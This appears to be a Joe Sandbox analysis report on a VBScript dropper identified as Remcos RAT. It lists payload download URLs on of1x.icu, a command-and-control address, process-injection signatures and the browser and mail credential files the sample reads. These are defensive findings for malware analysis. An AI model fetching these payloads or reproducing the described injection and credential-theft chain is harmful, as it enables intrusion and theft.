              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_238D2264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,10_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0041739B GetVersionExW,9_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2573780920.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000007FFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3660, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword10_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword10_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword10_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3660, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-D98D6XJump to behavior
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000008012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2573780920.0000000008026000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3317622787.0000000007FFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3660, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              1
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)412
              Process Injection
              1
              Software Packing
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts22
              Command and Scripting Interpreter
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS28
              System Information Discovery
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets41
              Security Software Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572960 Sample: Reqt 83291.vbs Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 30 of1x.icu 2->30 32 geoplugin.net 2->32 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 10 other signatures 2->46 8 powershell.exe 17 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 50 Early bird code injection technique detected 8->50 52 Writes to foreign memory regions 8->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 8->54 56 Queues an APC in another process (thread injection) 8->56 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        58 VBScript performs obfuscated calls to suspicious functions 11->58 60 Suspicious powershell command line found 11->60 62 Wscript starts Powershell (via cmd or directly) 11->62 64 2 other signatures 11->64 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 34 154.216.18.62, 2404, 49772, 49778 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->34 36 geoplugin.net 178.237.33.50, 49779, 80 ATOM86-ASATOM86NL Netherlands 13->36 66 Detected Remcos RAT 13->66 68 Tries to steal Mail credentials (via file registry) 13->68 70 Maps a DLL or memory area into another process 13->70 21 msiexec.exe 2 13->21         started        24 msiexec.exe 1 13->24         started        26 msiexec.exe 1 13->26         started        38 of1x.icu 104.21.86.72, 443, 49704, 49761 CLOUDFLARENETUS United States 19->38 72 Found suspicious powershell code related to unpacking or dynamic code loading 19->72 28 conhost.exe 19->28         started        signatures8 process9 signatures10 48 Tries to harvest and steal browser information (history, passwords, etc) 21->48

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://of1x.icu0%Avira URL Cloudsafe
              https://of1x.icu/cqhHdWpt/PiOlNxFUCT165.bin0%Avira URL Cloudsafe
              https://of1x.icu/XrVFrZoK/Skorter.rarXR0%Avira URL Cloudsafe
              https://of1x.icu/0%Avira URL Cloudsafe
              https://of1x.icu/XrVFrZoK/Skorter.rar0%Avira URL Cloudsafe
              http://of1x.icu0%Avira URL Cloudsafe
              https://of1x.icu/XrVFrZoK/Skorter.rarP0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              of1x.icu
              104.21.86.72
              truefalse
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://of1x.icu/cqhHdWpt/PiOlNxFUCT165.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gpfalse
                    high
                    https://of1x.icu/XrVFrZoK/Skorter.rarfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://of1x.icu/XrVFrZoK/Skorter.rarXRpowershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2191640831.00000292999FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.imvu.comrmsiexec.exe, 00000007.00000002.3329465729.00000000238A0000.00000040.10000000.00040000.00000000.sdmpfalse
                        high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://go.micropowershell.exe, 00000002.00000002.2158565248.000002928A57E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.imvu.commsiexec.exefalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://geoplugin.net/json.gpHRmsiexec.exe, 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://geoplugin.net/json.gplumsiexec.exe, 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2375867379.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000007.00000002.3329465729.00000000238A0000.00000040.10000000.00040000.00000000.sdmpfalse
                                            high
                                            https://www.google.commsiexec.exefalse
                                              high
                                              https://of1x.icu/msiexec.exe, 00000007.00000002.3317622787.0000000007FBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://geoplugin.net/msiexec.exe, 00000007.00000002.3317622787.0000000007FBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2191640831.00000292999FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401223856.00000000059B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://of1x.icupowershell.exe, 00000002.00000002.2158565248.000002928B3DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2158565248.0000029289BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://aka.ms/pscore6lBjqpowershell.exe, 00000004.00000002.2375867379.0000000004951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                        high
                                                        https://login.yahoo.com/config/loginmsiexec.exefalse
                                                          high
                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2158565248.0000029289991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.nirsoft.net/msiexec.exefalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2158565248.0000029289991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2375867379.0000000004951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://of1x.icu/XrVFrZoK/Skorter.rarPpowershell.exe, 00000002.00000002.2158565248.0000029289BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://of1x.icupowershell.exe, 00000002.00000002.2158565248.000002928B72B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.ebuddy.commsiexec.exefalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.86.72
                                                                  of1x.icuUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  154.216.18.62
                                                                  unknownSeychelles
                                                                  135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                  178.237.33.50
                                                                  geoplugin.netNetherlands
                                                                  8455ATOM86-ASATOM86NLfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1572960
                                                                  Start date and time:2024-12-11 10:42:07 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 30s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:12
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Reqt 83291.vbs
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.expl.evad.winVBS@14/10@2/3
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 97%
                                                                  • Number of executed functions: 172
                                                                  • Number of non-executed functions: 279
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .vbs
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 4088 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 5692 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  04:43:01API Interceptor79x Sleep call for process: powershell.exe modified
                                                                  04:44:23API Interceptor318942x Sleep call for process: msiexec.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  178.237.33.50DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • geoplugin.net/json.gp
                                                                  PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • geoplugin.net/json.gp
                                                                  matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • geoplugin.net/json.gp
                                                                  WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  geoplugin.netDOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  SKHT-ASShenzhenKatherineHengTechnologyInformationCoRH74mYjwoQ.elfGet hashmaliciousMiraiBrowse
                                                                  • 154.216.16.109
                                                                  tgCdafZIfZ.elfGet hashmaliciousMiraiBrowse
                                                                  • 154.216.16.109
                                                                  LiUgL2AoGI.elfGet hashmaliciousMiraiBrowse
                                                                  • 154.216.16.109
                                                                  hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                  • 156.230.19.183
                                                                  16RIueF7yh.elfGet hashmaliciousMiraiBrowse
                                                                  • 154.216.16.109
                                                                  https://listafrica.org/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                  • 154.216.17.175
                                                                  nshppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 156.241.11.54
                                                                  rarm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 156.241.11.52
                                                                  nsharm.elfGet hashmaliciousMiraiBrowse
                                                                  • 156.226.9.195
                                                                  mpsl.elfGet hashmaliciousMiraiBrowse
                                                                  • 156.241.11.86
                                                                  CLOUDFLARENETUSEBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 104.21.78.149
                                                                  https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.18.41.169
                                                                  https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                  • 104.18.95.41
                                                                  Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                  • 172.64.41.3
                                                                  https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
                                                                  • 104.21.37.221
                                                                  https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
                                                                  • 172.67.213.233
                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 172.67.177.134
                                                                  Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.67.152
                                                                  QUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.74.152
                                                                  DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  ATOM86-ASATOM86NLDOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 178.237.33.50
                                                                  1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.21.86.72
                                                                  https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
                                                                  • 104.21.86.72
                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.86.72
                                                                  Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 104.21.86.72
                                                                  QUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.21.86.72
                                                                  DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.86.72
                                                                  apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.21.86.72
                                                                  e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
